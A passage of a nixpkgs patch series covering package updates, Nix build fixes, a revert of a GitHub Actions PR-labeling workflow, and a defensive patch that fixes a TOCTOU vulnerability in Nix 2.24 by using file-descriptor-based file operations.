@@ -72,7 +72,7 @@ in "d /var/lib/misc 0755 root root -" # for dnsmasq.leases ]; - services.dbus.packages = with pkgs; [ waydroid ]; + services.dbus.packages = [ cfg.package ]; }; } From e1d83e3cee69a59ed9b9df80d1441bb607b24f91 Mon Sep 17 00:00:00 2001 From: wxt <3264117476@qq.com> Date: Sun, 22 Jun 2025 08:02:45 +0800 Subject: [PATCH 52/73] waydroid: adopt --- pkgs/by-name/wa/waydroid/package.nix | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/pkgs/by-name/wa/waydroid/package.nix b/pkgs/by-name/wa/waydroid/package.nix index c4c6128770e7..446c15d1bf83 100644 --- a/pkgs/by-name/wa/waydroid/package.nix +++ b/pkgs/by-name/wa/waydroid/package.nix @@ -108,6 +108,6 @@ python3Packages.buildPythonApplication rec { homepage = "https://github.com/waydroid/waydroid"; license = lib.licenses.gpl3Only; platforms = lib.platforms.linux; - maintainers = with lib.maintainers; [ ]; + maintainers = with lib.maintainers; [ bot-wxt1221 ]; }; } From 867c79b3c9f7fc3af5db488e866da6cf965353c2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Sandro=20J=C3=A4ckel?= Date: Mon, 16 Jun 2025 00:16:02 +0200 Subject: [PATCH 53/73] libutil: 
fix splicing of libblake3 --- .../package-management/nix/modular/src/libutil/package.nix | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/pkgs/tools/package-management/nix/modular/src/libutil/package.nix b/pkgs/tools/package-management/nix/modular/src/libutil/package.nix index 3e96aa0660c8..7ac84405cd24 100644 --- a/pkgs/tools/package-management/nix/modular/src/libutil/package.nix +++ b/pkgs/tools/package-management/nix/modular/src/libutil/package.nix @@ -27,9 +27,7 @@ mkMesonLibrary (finalAttrs: { [ brotli ] - ++ lib.optional (lib.versionAtLeast version "2.27") [ - libblake3 - ] + ++ lib.optional (lib.versionAtLeast version "2.27") libblake3 ++ [ libsodium openssl From 4853556b1f386a72aa3b56672f28083724257d6d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Sandro=20J=C3=A4ckel?= Date: Wed, 18 Jun 2025 16:59:34 +0200 Subject: [PATCH 54/73] nix: fix another lib.optional taking a list --- pkgs/tools/package-management/nix/common-autoconf.nix | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/pkgs/tools/package-management/nix/common-autoconf.nix b/pkgs/tools/package-management/nix/common-autoconf.nix index 01b87cddc17d..1d7ed8cba374 100644 --- a/pkgs/tools/package-management/nix/common-autoconf.nix +++ b/pkgs/tools/package-management/nix/common-autoconf.nix @@ -111,7 +111,7 @@ let "shadowstack" ] ++ lib.optional stdenv.hostPlatform.isMusl "fortify"; - nativeInstallCheckInputs = lib.optional atLeast224 [ + nativeInstallCheckInputs = lib.optionals atLeast224 [ git man ]; From dd3ce1ee90f7eccd802be74a49c13b03e8fdcaa8 Mon Sep 17 00:00:00 2001 From: Kerstin Humm Date: Tue, 24 Jun 2025 13:01:19 +0200 Subject: [PATCH 55/73] weblate: 5.12.1 -> 5.12.2 Changelog: https://github.com/WeblateOrg/weblate/releases/tag/weblate-5.12.2 --- pkgs/by-name/we/weblate/package.nix | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/pkgs/by-name/we/weblate/package.nix b/pkgs/by-name/we/weblate/package.nix index 259f5d06c125..b0500def65f7 100644 --- a/pkgs/by-name/we/weblate/package.nix +++ b/pkgs/by-name/we/weblate/package.nix @@ -27,7 +27,7 @@ let in python.pkgs.buildPythonApplication rec { pname = "weblate"; - version = "5.12.1"; + version = "5.12.2"; pyproject = true; @@ -40,7 +40,7 @@ python.pkgs.buildPythonApplication rec { owner = "WeblateOrg"; repo = "weblate"; tag = "weblate-${version}"; - hash = "sha256-8tqPxvSvVG1j/TGMozihtBYsn7oly41lP4iK3BwTmVk="; + hash = "sha256-YaP0lhL7E0pv3ZyfpQ47CjhrzjJPDwGpSTcgXDaMZdA="; }; patches = [ From 8a4770fc7b2f75766822256c407d1b95f800614a Mon Sep 17 00:00:00 2001 From: "R. 
Ryantm" Date: Tue, 24 Jun 2025 13:34:38 +0000 Subject: [PATCH 56/73] cargo-show-asm: 0.2.49 -> 0.2.50 --- pkgs/by-name/ca/cargo-show-asm/package.nix | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/pkgs/by-name/ca/cargo-show-asm/package.nix b/pkgs/by-name/ca/cargo-show-asm/package.nix index 9cfb0546a5f3..b1203e41f8e1 100644 --- a/pkgs/by-name/ca/cargo-show-asm/package.nix +++ b/pkgs/by-name/ca/cargo-show-asm/package.nix @@ -10,15 +10,15 @@ rustPlatform.buildRustPackage rec { pname = "cargo-show-asm"; - version = "0.2.49"; + version = "0.2.50"; src = fetchCrate { inherit pname version; - hash = "sha256-DH3jE7nGdwIQVHk80EsC4gYh5+wk6VMWS0d+jZYnX1I="; + hash = "sha256-BmRcaZKAWwRJQyVsymudDg6l7O9pcE2s+Y9VgaJ/Q48="; }; useFetchCargoVendor = true; - cargoHash = "sha256-R+I6EVzHvI1Et4nvxENc3IvfmSLr/g77x4wCMNb2R88="; + cargoHash = "sha256-+NOk3lzBsgPs1AIUfwWP4sOKSV3XPZsPxl0QNPXPgZQ="; nativeBuildInputs = [ installShellFiles From c366efa6e2816c2cb48b3018fe00ceb8ca6cbc81 Mon Sep 17 00:00:00 2001 From: Wolfgang Walther Date: Tue, 24 Jun 2025 14:00:20 +0000 Subject: [PATCH 57/73] Revert "workflows/labels: manage stale & merge conflict labels" --- .github/workflows/labels.yml | 361 ++++++++++++++--------------------- 1 file changed, 147 insertions(+), 214 deletions(-) diff --git a/.github/workflows/labels.yml b/.github/workflows/labels.yml index c3bc9301f67f..83cf0511fc5e 100644 --- a/.github/workflows/labels.yml +++ b/.github/workflows/labels.yml @@ -17,12 +17,18 @@ on: NIXPKGS_CI_APP_PRIVATE_KEY: required: true workflow_dispatch: + inputs: + updatedWithin: + description: 'Updated within [hours]' + type: number + required: false + default: 0 # everything since last run concurrency: # This explicitly avoids using `run_id` for the concurrency key to make sure that only - # *one* scheduled run can run at a time. + # *one* non-PR run can run at a time. group: labels-${{ github.workflow }}-${{ github.event_name }}-${{ github.event.pull_request.number }} - # PR-triggered runs will be cancelled, but scheduled runs will be queued. + # PR- and manually-triggered runs will be cancelled, but scheduled runs will be queued. cancel-in-progress: ${{ github.event_name != 'schedule' }} # This is used as fallback without app only. @@ -63,6 +69,8 @@ jobs: - name: Labels from API data and Eval results uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1 + env: + UPDATED_WITHIN: ${{ inputs.updatedWithin }} with: github-token: ${{ steps.app-token.outputs.token || github.token }} script: | @@ -93,9 +101,6 @@ jobs: github.hook.wrap('request', async (request, options) => { // Requests to the /rate_limit endpoint do not count against the rate limit. if (options.url == '/rate_limit') return request(options) - // Search requests are in a different resource group, which allows 30 requests / minute. - // We do less than a handful each run, so not implementing throttling for now. - if (options.url.startsWith('/search/')) return request(options) stats.requests++ if (['POST', 'PUT', 'PATCH', 'DELETE'].includes(options.method)) return writeLimits.schedule(request.bind(null, options)) @@ -123,68 +128,102 @@ jobs: const reservoirUpdater = setInterval(updateReservoir, 60 * 1000) process.on('uncaughtException', () => clearInterval(reservoirUpdater)) - async function handle(item) { - try { - const log = (k,v,skip) => { - core.info(`#${item.number} - ${k}: ${v}` + (skip ? 
' (skipped)' : '')) - return skip - } + if (process.env.UPDATED_WITHIN && !/^\d+$/.test(process.env.UPDATED_WITHIN)) + throw new Error('Please enter "updated within" as integer in hours.') - log('Last updated at', item.updated_at) - stats.prs++ - log('URL', item.html_url) + const cutoff = new Date(await (async () => { + // Always run for Pull Request triggers, no cutoff since there will be a single + // response only anyway. 0 is the Unix epoch, so always smaller. + if (context.payload.pull_request?.number) return 0 - const pull_number = item.number - const issue_number = item.number + // Manually triggered via UI when updatedWithin is set. Will fallthrough to the last + // option if the updatedWithin parameter is set to 0, which is the default. + const updatedWithin = Number.parseInt(process.env.UPDATED_WITHIN, 10) + if (updatedWithin) return new Date().getTime() - updatedWithin * 60 * 60 * 1000 - // The search result is of a format that works for both issues and pull requests and thus - // does not have all fields of a full pull_request response. Notably, it is missing `head.sha`, - // which we need to fetch the workflow run below. When triggered via pull_request event, - // this field is already available. - // This API request is also important for the merge-conflict label, because it triggers the - // creation of a new test merge commit. This is needed to actually determine the state of a PR. - const pull_request = item.head ? item : (await github.rest.pulls.get({ - ...context.repo, - pull_number - })).data + // Normally a scheduled run, but could be workflow_dispatch, see above. Go back as far + // as the last successful run of this workflow to make sure we are not leaving anyone + // behind on GHA failures. + // Defaults to go back 1 hour on the first run. + return (await github.rest.actions.listWorkflowRuns({ + ...context.repo, + workflow_id: 'labels.yml', + event: 'schedule', + status: 'success', + exclude_pull_requests: true + })).data.workflow_runs[0]?.created_at ?? new Date().getTime() - 1 * 60 * 60 * 1000 + })()) + core.info('cutoff timestamp: ' + cutoff.toISOString()) - const run_id = (await github.rest.actions.listWorkflowRuns({ - ...context.repo, - workflow_id: 'pr.yml', - event: 'pull_request_target', - status: 'success', - exclude_pull_requests: true, - head_sha: pull_request.head.sha - })).data.workflow_runs[0]?.id ?? - // TODO: Remove this after 2025-09-17, at which point all eval.yml artifacts will have expired. - (await github.rest.actions.listWorkflowRuns({ + // To simplify this action's logic we fetch the pull_request data again below, even if + // we are already in a pull_request event's context and would have the data readily + // available. We do this by filtering the list of pull requests with head and base + // branch - there can only be a single open Pull Request for any such combination. + const prEventCondition = !context.payload.pull_request ? undefined : { + // "label" is in the format of `user:branch` or `org:branch` + head: context.payload.pull_request.head.label, + base: context.payload.pull_request.base.ref + } + + const prs = await github.paginate( + github.rest.pulls.list, + { + ...context.repo, + state: 'open', + sort: 'updated', + direction: 'desc', + ...prEventCondition + }, + (response, done) => response.data.map(async (pull_request) => { + try { + const log = (k,v,skip) => { + core.info(`PR #${pull_request.number} - ${k}: ${v}` + (skip ? 
' (skipped)' : '')) + return skip + } + + if (log('Last updated at', pull_request.updated_at, new Date(pull_request.updated_at) < cutoff)) + return done() + stats.prs++ + log('URL', pull_request.html_url) + + const run_id = (await github.rest.actions.listWorkflowRuns({ ...context.repo, - // In older PRs, we need eval.yml instead of pr.yml. - workflow_id: 'eval.yml', + workflow_id: 'pr.yml', event: 'pull_request_target', - status: 'success', + // For PR events, the workflow run is still in progress with this job itself. + status: prEventCondition ? 'in_progress' : 'success', exclude_pull_requests: true, head_sha: pull_request.head.sha - })).data.workflow_runs[0]?.id + })).data.workflow_runs[0]?.id ?? + // TODO: Remove this after 2025-09-17, at which point all eval.yml artifacts will have expired. + (await github.rest.actions.listWorkflowRuns({ + ...context.repo, + // In older PRs, we need eval.yml instead of pr.yml. + workflow_id: 'eval.yml', + event: 'pull_request_target', + status: 'success', + exclude_pull_requests: true, + head_sha: pull_request.head.sha + })).data.workflow_runs[0]?.id - // Newer PRs might not have run Eval to completion, yet. - // Older PRs might not have an eval.yml workflow, yet. - // In either case we continue without fetching an artifact on a best-effort basis. - log('Last eval run', run_id ?? '') + // Newer PRs might not have run Eval to completion, yet. We can skip them, because this + // job will be run as part of that Eval run anyway. + if (log('Last eval run', run_id ?? '', !run_id)) + return; - const artifact = run_id && (await github.rest.actions.listWorkflowRunArtifacts({ - ...context.repo, - run_id, - name: 'comparison' - })).data.artifacts[0] + const artifact = (await github.rest.actions.listWorkflowRunArtifacts({ + ...context.repo, + run_id, + name: 'comparison' + })).data.artifacts[0] - // Instead of checking the boolean artifact.expired, we will give us a minute to - // actually download the artifact in the next step and avoid that race condition. - // Older PRs, where the workflow run was already eval.yml, but the artifact was not - // called "comparison", yet, will skip the download. - const expired = !artifact || new Date(artifact?.expires_at ?? 0) < new Date(new Date().getTime() + 60 * 1000) - log('Artifact expires at', artifact?.expires_at ?? '') - if (!expired) { + // Instead of checking the boolean artifact.expired, we will give us a minute to + // actually download the artifact in the next step and avoid that race condition. + // Older PRs, where the workflow run was already eval.yml, but the artifact was not + // called "comparison", yet, will be skipped as well. + const expired = new Date(artifact?.expires_at ?? 0) < new Date(new Date().getTime() + 60 * 1000) + if (log('Artifact expires at', artifact?.expires_at ?? '', expired)) + return; stats.artifacts++ await artifactClient.downloadArtifact(artifact.id, { @@ -193,82 +232,39 @@ jobs: repositoryOwner: context.repo.owner, token: core.getInput('github-token') }, - path: path.resolve(pull_number.toString()), + path: path.resolve(pull_request.number.toString()), expectedHash: artifact.digest }) - } - // Create a map (Label -> Boolean) of all currently set labels. - // Each label is set to True and can be disabled later. 
- const before = Object.fromEntries( - (await github.paginate(github.rest.issues.listLabelsOnIssue, { - ...context.repo, - issue_number - })) - .map(({ name }) => [name, true]) - ) - - const approvals = new Set( - (await github.paginate(github.rest.pulls.listReviews, { - ...context.repo, - pull_number - })) - .filter(review => review.state == 'APPROVED') - .map(review => review.user?.id) - ) - - const latest_event_at = new Date( - (await github.paginate( - github.rest.issues.listEventsForTimeline, - { + // Create a map (Label -> Boolean) of all currently set labels. + // Each label is set to True and can be disabled later. + const before = Object.fromEntries( + (await github.paginate(github.rest.issues.listLabelsOnIssue, { ...context.repo, - issue_number, - per_page: 100 - } - )) - // We also ignore base_ref_force_pushed, which will not happen in nixpkgs, but - // is very useful for testing in forks. - .findLast(({ event }) => !['labeled', 'unlabeled', 'base_ref_force_pushed'].includes(event)) - ?.created_at ?? item.created_at - ) - const stale_at = new Date(new Date().setDate(new Date().getDate() - 180)) + issue_number: pull_request.number + })) + .map(({ name }) => [name, true]) + ) - // Manage most of the labels, without eval results - const after = Object.assign( - {}, - before, - { - // We intentionally don't use the mergeable or mergeable_state attributes. - // Those have an intermediate state while the test merge commit is created. - // This doesn't work well for us, because we might have just triggered another - // test merge commit creation by request the pull request via API at the start - // of this function. - // The attribute merge_commit_sha keeps the old value of null or the hash *until* - // the new test merge commit has either successfully been created or failed so. - // This essentially means we are updating the merge conflict label in two steps: - // On the first pass of the day, we just fetch the pull request, which triggers - // the creation. At this stage, the label is likely not updated, yet. - // The second pass will then read the result from the first pass and set the label. - '2.status: merge conflict': !pull_request.merge_commit_sha, - '2.status: stale': !before['1.severity: security'] && latest_event_at < stale_at, - '12.approvals: 1': approvals.size == 1, - '12.approvals: 2': approvals.size == 2, - '12.approvals: 3+': approvals.size >= 3, - '12.first-time contribution': - [ 'NONE', 'FIRST_TIMER', 'FIRST_TIME_CONTRIBUTOR' ].includes(pull_request.author_association), - } - ) + const approvals = new Set( + (await github.paginate(github.rest.pulls.listReviews, { + ...context.repo, + pull_number: pull_request.number + })) + .filter(review => review.state == 'APPROVED') + .map(review => review.user?.id) + ) - // Manage labels based on eval results - if (!expired) { const maintainers = new Set(Object.keys( - JSON.parse(await readFile(`${pull_number}/maintainers.json`, 'utf-8')) + JSON.parse(await readFile(`${pull_request.number}/maintainers.json`, 'utf-8')) ).map(m => Number.parseInt(m, 10))) - const evalLabels = JSON.parse(await readFile(`${pull_number}/changed-paths.json`, 'utf-8')).labels + const evalLabels = JSON.parse(await readFile(`${pull_request.number}/changed-paths.json`, 'utf-8')).labels - Object.assign( - after, + // Manage the labels + const after = Object.assign( + {}, + before, // Ignore `evalLabels` if it's an array. // This can happen for older eval runs, before we switched to objects. 
// The old eval labels would have been set by the eval run, @@ -276,104 +272,41 @@ jobs: // TODO: Simplify once old eval results have expired (~2025-10) (Array.isArray(evalLabels) ? undefined : evalLabels), { + '12.approvals: 1': approvals.size == 1, + '12.approvals: 2': approvals.size == 2, + '12.approvals: 3+': approvals.size >= 3, '12.approved-by: package-maintainer': Array.from(maintainers).some(m => approvals.has(m)), + '12.first-time contribution': + [ 'NONE', 'FIRST_TIMER', 'FIRST_TIME_CONTRIBUTOR' ].includes(pull_request.author_association), } ) + + // No need for an API request, if all labels are the same. + const hasChanges = Object.keys(after).some(name => (before[name] ?? false) != after[name]) + if (log('Has changes', hasChanges, !hasChanges)) + return; + + // Skipping labeling on a pull_request event, because we have no privileges. + const labels = Object.entries(after).filter(([,value]) => value).map(([name]) => name) + if (log('Set labels', labels, context.eventName == 'pull_request')) + return; + + await github.rest.issues.setLabels({ + ...context.repo, + issue_number: pull_request.number, + labels + }) + } catch (cause) { + throw new Error(`Labeling PR #${pull_request.number} failed.`, { cause }) } + }) + ); - // No need for an API request, if all labels are the same. - const hasChanges = Object.keys(after).some(name => (before[name] ?? false) != after[name]) - if (log('Has changes', hasChanges, !hasChanges)) - return; + (await Promise.allSettled(prs.flat())) + .filter(({ status }) => status == 'rejected') + .map(({ reason }) => core.setFailed(`${reason.message}\n${reason.cause.stack}`)) - // Skipping labeling on a pull_request event, because we have no privileges. - const labels = Object.entries(after).filter(([,value]) => value).map(([name]) => name) - if (log('Set labels', labels, context.eventName == 'pull_request')) - return; - - await github.rest.issues.setLabels({ - ...context.repo, - issue_number, - labels - }) - } catch (cause) { - throw new Error(`Labeling #${item.number} failed.`, { cause }) - } - } - - if (context.payload.pull_request) { - await handle(context.payload.pull_request) - } else { - const workflowData = (await github.rest.actions.listWorkflowRuns({ - ...context.repo, - workflow_id: 'labels.yml', - event: 'schedule', - status: 'success', - exclude_pull_requests: true, - per_page: 1 - })).data - - // Go back as far as the last successful run of this workflow to make sure - // we are not leaving anyone behind on GHA failures. - // Defaults to go back 1 hour on the first run. - const cutoff = new Date(workflowData.workflow_runs[0]?.created_at ?? new Date().getTime() - 1 * 60 * 60 * 1000) - core.info('cutoff timestamp: ' + cutoff.toISOString()) - - const updatedItems = await github.paginate( - github.rest.search.issuesAndPullRequests, - { - q: [ - `repo:"${process.env.GITHUB_REPOSITORY}"`, - 'type:pr', - 'is:open', - `updated:>=${cutoff.toISOString()}` - ].join(' AND '), - // TODO: Remove in 2025-10, when it becomes the default. - advanced_search: true - } - ) - - const allOptions = { - q: [ - `repo:"${process.env.GITHUB_REPOSITORY}"`, - 'type:pr', - 'is:open' - ].join(' AND '), - sort: 'created', - direction: 'asc', - // TODO: Remove in 2025-10, when it becomes the default. 
- advanced_search: true - } - - const { total_count: total_pulls } = (await github.rest.search.issuesAndPullRequests({ - ...allOptions, - per_page: 1 - })).data - const { total_count: total_runs } = workflowData - const allItems = (await github.rest.search.issuesAndPullRequests({ - ...allOptions, - per_page: 100, - // We iterate through pages of 100 items across scheduled runs. With currently ~7000 open PRs and - // up to 6*24=144 scheduled runs per day, we hit every PR twice each day. - // We might not hit every PR on one iteration, because the pages will shift slightly when - // PRs are closed or merged. We assume this to be OK on the bigger scale, because a PR which was - // missed once, would have to move through the whole page to be missed again. This is very unlikely, - // so it should certainly be hit on the next iteration. - // TODO: Evaluate after a while, whether the above holds still true and potentially implement - // an overlap between runs. - page: total_runs % Math.ceil(total_pulls / 100) - })).data.items - - // Some items might be in both search results, so filtering out duplicates as well. - const items = [].concat(updatedItems, allItems) - .filter((thisItem, idx, arr) => idx == arr.findIndex(firstItem => firstItem.number == thisItem.number)) - - ;(await Promise.allSettled(items.map(handle))) - .filter(({ status }) => status == 'rejected') - .map(({ reason }) => core.setFailed(`${reason.message}\n${reason.cause.stack}`)) - - core.notice(`Processed ${stats.prs} PRs, made ${stats.requests + stats.artifacts} API requests and downloaded ${stats.artifacts} artifacts.`) - } + core.notice(`Processed ${stats.prs} PRs, made ${stats.requests + stats.artifacts} API requests and downloaded ${stats.artifacts} artifacts.`) clearInterval(reservoirUpdater) - name: Log current API rate limits From 3d27c5f2485588fd7f61eb2e0ead168d2b94addc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= Date: Sun, 22 Jun 2025 18:50:02 +0200 Subject: [PATCH 58/73] nix_2_24: add patch for GHSA-g948-229j-48j3 This addresses a TOCTOU (Time-of-Check to Time-of-Use) vulnerability in Nix's build system that could potentially allow privilege escalation or unauthorized file access during the build process. 
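Conceptually, the fix replaces path-based file operations, which race against a swap of the temporary build directory, with operations relative to a pinned directory file descriptor. A minimal POSIX sketch of that pattern, with assumed names (`write_owned_file` is illustrative, not from the patch; the real changes are in the hunks below):

    #include <fcntl.h>
    #include <sys/types.h>
    #include <unistd.h>

    // Create `name` inside the directory pinned by `dirfd`, write its contents
    // and hand it over to the build user, all through the same file descriptor.
    // O_EXCL + O_NOFOLLOW make a planted symlink fail instead of being followed.
    int write_owned_file(int dirfd, const char *name, uid_t uid, gid_t gid,
                         const char *data, size_t len) {
        int fd = openat(dirfd, name,
                        O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW | O_CLOEXEC, 0666);
        if (fd < 0) return -1;
        if (write(fd, data, len) != (ssize_t)len || fchown(fd, uid, gid) < 0) {
            close(fd);
            return -1;
        }
        return close(fd);
    }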
The patch includes: - Safe file operations using file descriptors - Secure temporary directory handling - Safe chown operations - PassAsFile security improvements - Path validation fixes --- pkgs/tools/package-management/nix/default.nix | 1 + .../patches/ghsa-g948-229j-48j3-2.24.patch | 436 ++++++++++++++++++ 2 files changed, 437 insertions(+) create mode 100644 pkgs/tools/package-management/nix/patches/ghsa-g948-229j-48j3-2.24.patch diff --git a/pkgs/tools/package-management/nix/default.nix b/pkgs/tools/package-management/nix/default.nix index 7d3c6fbfcc59..839b6e0b3127 100644 --- a/pkgs/tools/package-management/nix/default.nix +++ b/pkgs/tools/package-management/nix/default.nix @@ -171,6 +171,7 @@ lib.makeExtensible ( nix_2_24 = commonAutoconf { version = "2.24.14"; hash = "sha256-SthMCsj6POjawLnJq9+lj/UzObX9skaeN1UGmMZiwTY="; + patches = [ ./patches/ghsa-g948-229j-48j3-2.24.patch ]; self_attribute_name = "nix_2_24"; }; diff --git a/pkgs/tools/package-management/nix/patches/ghsa-g948-229j-48j3-2.24.patch b/pkgs/tools/package-management/nix/patches/ghsa-g948-229j-48j3-2.24.patch new file mode 100644 index 000000000000..27b16dc6b8c6 --- /dev/null +++ b/pkgs/tools/package-management/nix/patches/ghsa-g948-229j-48j3-2.24.patch @@ -0,0 +1,436 @@ +From b0fab9f90b397a2b02f41df5f467ae3cf8b91c3c Mon Sep 17 00:00:00 2001 +From: Eelco Dolstra +Date: Thu, 19 Jun 2025 16:20:34 +0200 +Subject: [PATCH] Fixes for GHSA-g948-229j-48j3 +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Squashed commit of the following: + +commit 04fff3a637d455cbb1d75937a235950e43008db9 +Author: Eelco Dolstra +Date: Thu Jun 12 12:30:32 2025 +0200 + + Chown structured attr files safely + +commit 5417ad445e414c649d0cfc71a05661c7bf8f3ef5 +Author: Eelco Dolstra +Date: Thu Jun 12 12:14:04 2025 +0200 + + Replace 'bool sync' with an enum for clarity + + And drop writeFileAndSync(). + +commit 7ae0141f328d8e8e1094be24665789c05f974ba6 +Author: Eelco Dolstra +Date: Thu Jun 12 11:35:28 2025 +0200 + + Drop guessOrInventPathFromFD() + + No need to do hacky stuff like that when we already know the original path. + +commit 45b05098bd019da7c57cd4227a89bfd0fa65bb08 +Author: Eelco Dolstra +Date: Thu Jun 12 11:15:58 2025 +0200 + + Tweak comment + +commit 0af15b31209d1b7ec8addfae9a1a6b60d8f35848 +Author: Raito Bezarius +Date: Thu Mar 27 12:22:26 2025 +0100 + + libstore: ensure that temporary directory is always 0o000 before deletion + + In the case the deletion fails, we should ensure that the temporary + directory cannot be used for nefarious purposes. + + Change-Id: I498a2dd0999a74195d13642f44a5de1e69d46120 + Signed-off-by: Raito Bezarius + +commit 2c20fa37b15cfa03ac6a1a6a47cdb2ed66c0827e +Author: Raito Bezarius +Date: Wed Mar 26 12:42:55 2025 +0100 + + libutil: ensure that `_deletePath` does NOT use absolute paths with dirfds + + When calling `_deletePath` with a parent file descriptor, `openat` is + made effective by using relative paths to the directory file descriptor. + + To avoid the problem, the signature is changed to resist misuse with an + assert in the prologue of the function. 
+ + Change-Id: I6b3fc766bad2afe54dc27d47d1df3873e188de96 + Signed-off-by: Raito Bezarius + +commit d3c370bbcae48bb825ce19fd0f73bb4eefd2c9ea +Author: Raito Bezarius +Date: Wed Mar 26 01:07:47 2025 +0100 + + libstore: ensure that `passAsFile` is created in the original temp dir + + This ensures that `passAsFile` data is created inside the expected + temporary build directory by `openat()` from the parent directory file + descriptor. + + This avoids a TOCTOU which is part of the attack chain of CVE-????. + + Change-Id: Ie5273446c4a19403088d0389ae8e3f473af8879a + Signed-off-by: Raito Bezarius + +commit 45d3598724f932d024ef6bc2ffb00c1bb90e6018 +Author: Raito Bezarius +Date: Wed Mar 26 01:06:03 2025 +0100 + + libutil: writeFile variant for file descriptors + + `writeFile` lose its `sync` boolean flag to make things simpler. + + A new `writeFileAndSync` function is created and all call sites are + converted to it. + + Change-Id: Ib871a5283a9c047db1e4fe48a241506e4aab9192 + Signed-off-by: Raito Bezarius + +commit 732bd9b98cabf4aaf95a01fd318923de303f9996 +Author: Raito Bezarius +Date: Wed Mar 26 01:05:34 2025 +0100 + + libstore: chown to builder variant for file descriptors + + We use it immediately for the build temporary directory. + + Change-Id: I180193c63a2b98721f5fb8e542c4e39c099bb947 + Signed-off-by: Raito Bezarius + +commit 962c65f8dcd5570dd92c72370a862c7b38942e0d +Author: Raito Bezarius +Date: Wed Mar 26 01:04:59 2025 +0100 + + libstore: open build directory as a dirfd as well + + We now keep around a proper AutoCloseFD around the temporary directory + which we plan to use for openat operations and avoiding the build + directory being swapped out while we are doing something else. + + Change-Id: I18d387b0f123ebf2d20c6405cd47ebadc5505f2a + Signed-off-by: Raito Bezarius + +commit c9b42462b75b5a37ee6564c2b53cff186c8323da +Author: Raito Bezarius +Date: Wed Mar 26 01:04:12 2025 +0100 + + libutil: guess or invent a path from file descriptors + + This is useful for certain error recovery paths (no pun intended) that + does not thread through the original path name. 
+ + Change-Id: I2d800740cb4f9912e64c923120d3f977c58ccb7e + Signed-off-by: Raito Bezarius + +Signed-off-by: Jörg Thalheim +--- + src/libstore/local-store.cc | 6 +-- + .../unix/build/local-derivation-goal.cc | 46 ++++++++++++++---- + .../unix/build/local-derivation-goal.hh | 20 ++++++++ + src/libutil/file-system.cc | 47 +++++++++++-------- + src/libutil/file-system.hh | 8 +++- + 5 files changed, 94 insertions(+), 33 deletions(-) + +diff --git a/src/libstore/local-store.cc b/src/libstore/local-store.cc +index c6e3af456..c5489444e 100644 +--- a/src/libstore/local-store.cc ++++ b/src/libstore/local-store.cc +@@ -187,7 +187,7 @@ void migrateCASchema(SQLite& db, Path schemaPath, AutoCloseFD& lockFd) + txn.commit(); + } + +- writeFile(schemaPath, fmt("%d", nixCASchemaVersion), 0666, true); ++ writeFile(schemaPath, fmt("%d", nixCASchemaVersion), 0666, FsSync::Yes); + lockFile(lockFd.get(), ltRead, true); + } + } +@@ -345,7 +345,7 @@ LocalStore::LocalStore( + else if (curSchema == 0) { /* new store */ + curSchema = nixSchemaVersion; + openDB(*state, true); +- writeFile(schemaPath, fmt("%1%", curSchema), 0666, true); ++ writeFile(schemaPath, fmt("%1%", curSchema), 0666, FsSync::Yes); + } + + else if (curSchema < nixSchemaVersion) { +@@ -394,7 +394,7 @@ LocalStore::LocalStore( + txn.commit(); + } + +- writeFile(schemaPath, fmt("%1%", nixSchemaVersion), 0666, true); ++ writeFile(schemaPath, fmt("%1%", nixSchemaVersion), 0666, FsSync::Yes); + + lockFile(globalLock.get(), ltRead, true); + } +diff --git a/src/libstore/unix/build/local-derivation-goal.cc b/src/libstore/unix/build/local-derivation-goal.cc +index f8824e9ce..82c79f361 100644 +--- a/src/libstore/unix/build/local-derivation-goal.cc ++++ b/src/libstore/unix/build/local-derivation-goal.cc +@@ -526,7 +526,14 @@ void LocalDerivationGoal::startBuilder() + } else { + tmpDir = topTmpDir; + } +- chownToBuilder(tmpDir); ++ ++ /* The TOCTOU between the previous mkdir call and this open call is unavoidable due to ++ POSIX semantics.*/ ++ tmpDirFd = AutoCloseFD{open(tmpDir.c_str(), O_RDONLY | O_NOFOLLOW | O_DIRECTORY)}; ++ if (!tmpDirFd) ++ throw SysError("failed to open the build temporary directory descriptor '%1%'", tmpDir); ++ ++ chownToBuilder(tmpDirFd.get(), tmpDir); + + for (auto & [outputName, status] : initialOutputs) { + /* Set scratch path we'll actually use during the build. 
+@@ -1110,9 +1117,7 @@ void LocalDerivationGoal::initTmpDir() { + } else { + auto hash = hashString(HashAlgorithm::SHA256, i.first); + std::string fn = ".attr-" + hash.to_string(HashFormat::Nix32, false); +- Path p = tmpDir + "/" + fn; +- writeFile(p, rewriteStrings(i.second, inputRewrites)); +- chownToBuilder(p); ++ writeBuilderFile(fn, rewriteStrings(i.second, inputRewrites)); + env[i.first + "Path"] = tmpDirInSandbox + "/" + fn; + } + } +@@ -1217,11 +1222,9 @@ void LocalDerivationGoal::writeStructuredAttrs() + + auto jsonSh = writeStructuredAttrsShell(json); + +- writeFile(tmpDir + "/.attrs.sh", rewriteStrings(jsonSh, inputRewrites)); +- chownToBuilder(tmpDir + "/.attrs.sh"); ++ writeBuilderFile(".attrs.sh", rewriteStrings(jsonSh, inputRewrites)); + env["NIX_ATTRS_SH_FILE"] = tmpDirInSandbox + "/.attrs.sh"; +- writeFile(tmpDir + "/.attrs.json", rewriteStrings(json.dump(), inputRewrites)); +- chownToBuilder(tmpDir + "/.attrs.json"); ++ writeBuilderFile(".attrs.json", rewriteStrings(json.dump(), inputRewrites)); + env["NIX_ATTRS_JSON_FILE"] = tmpDirInSandbox + "/.attrs.json"; + } + } +@@ -1730,6 +1733,24 @@ void setupSeccomp() + #endif + } + ++void LocalDerivationGoal::chownToBuilder(int fd, const Path & path) ++{ ++ if (!buildUser) return; ++ if (fchown(fd, buildUser->getUID(), buildUser->getGID()) == -1) ++ throw SysError("cannot change ownership of file '%1%'", path); ++} ++ ++void 